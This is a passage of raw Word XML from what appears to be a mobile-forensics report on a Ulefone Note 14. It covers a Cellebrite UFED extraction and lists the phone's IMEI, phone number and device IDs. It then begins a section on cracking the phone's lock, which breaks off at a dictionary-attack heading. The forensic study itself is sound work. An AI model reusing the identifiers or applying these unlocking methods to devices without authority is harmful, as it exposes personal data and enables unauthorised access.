    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gjn980sqpxo3" w:id="79"/>
      <w:bookmarkEnd w:id="79"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extraction Summary using Cellebrite UFED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The following summary provides detailed information about the Ulefone Note 14 device, including its hardware, software, and network-related attributes, as extracted using Cellebrite UFED tool:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Chipset: MT6761</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Client Utilization in Extraction: Yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Advertising ID: 0a24f44d-5908-42bd-a7cb-f7e37ea3aad5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Android ID: 749c315aaaa78ca3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detected Manufacturer: Ulefone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detected model: Note 14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phone date/time: 08/12/2023, 12:57:49</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phone Revision: 12 SP1A.210812.016, build number 1679135682</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMEI: 355617730545771</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Model: Note 14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MSISDN: 918778244595</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MSISDN Type: Standard (MSISDN)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OS: Android 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OS_Version: 12</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">SecurityPatchLevel: 05/03/2023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vendor: Ulefone</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5451633" cy="2940521"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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451633" cy="2940521"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4: Extraction Summary using Cellebrite UFED</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k9k1ltlbgjfg" w:id="80"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Storage and Backup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The process of using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cellebrite's Universal Forensic Extraction Device (UFED)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for mobile forensics on a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ulefone Note14 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">involves several key steps for both the device and its </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nano SIM card</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Although the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ulefone Note14</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not listed in Cellebrite's supported devices, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UFED's</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"AUTO-DETECT"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature is used for processing. To prepare the phone, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'Developer Options'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are unlocked by accessing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'Settings'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, tapping </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'Build Number'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> seven times, and enabling </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'USB Debugging'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'Stay Awake'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The USB connection is set to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Media Transfer Protocol (MTP)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. For forensic imaging, the phone is connected to a computer via USB, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'Advanced Logical' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">extraction is selected in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UFED</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, with data saved to a specified folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Additionally, for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIM card data extraction</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cellebrite UFED SIM Card adapter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used. The Nano SIM card is connected to a PC via the adapter, and the UFED software is launched to perform an 'Advanced Logical' extraction, saving the data to a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pre-defined</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> location on the PC. This method ensures comprehensive data retrieval from both the device and the SIM card.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n8fgw8du09u2" w:id="81"/>
      <w:bookmarkEnd w:id="81"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald Medium" w:cs="Oswald Medium" w:eastAsia="Oswald Medium" w:hAnsi="Oswald Medium"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o4wxb7oh4ltx" w:id="82"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013E">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The phone under investigation was password-protected. I attempted various methods to crack the password, but encountered challenges with each approach:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3b2z8av6n3sn" w:id="83"/>
      <w:bookmarkEnd w:id="83"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contacting the Manufacturer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When our team contacted the manufacturer, they required us to confirm ownership by verifying purchase details, which we didn't possess. Consequently, this method proved unsuccessful.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7xbhrsv8sfgd" w:id="84"/>
      <w:bookmarkEnd w:id="84"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ADB Connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The ADB connection failed because </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USB debugging</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was turned off.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bmbl212qi4jr" w:id="85"/>
      <w:bookmarkEnd w:id="85"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jailbreaking the Device</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I refrained from attempting to jailbreak or root the device.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nyffvq9p0wha" w:id="86"/>
      <w:bookmarkEnd w:id="86"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute-Force Attack: Dictionary Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
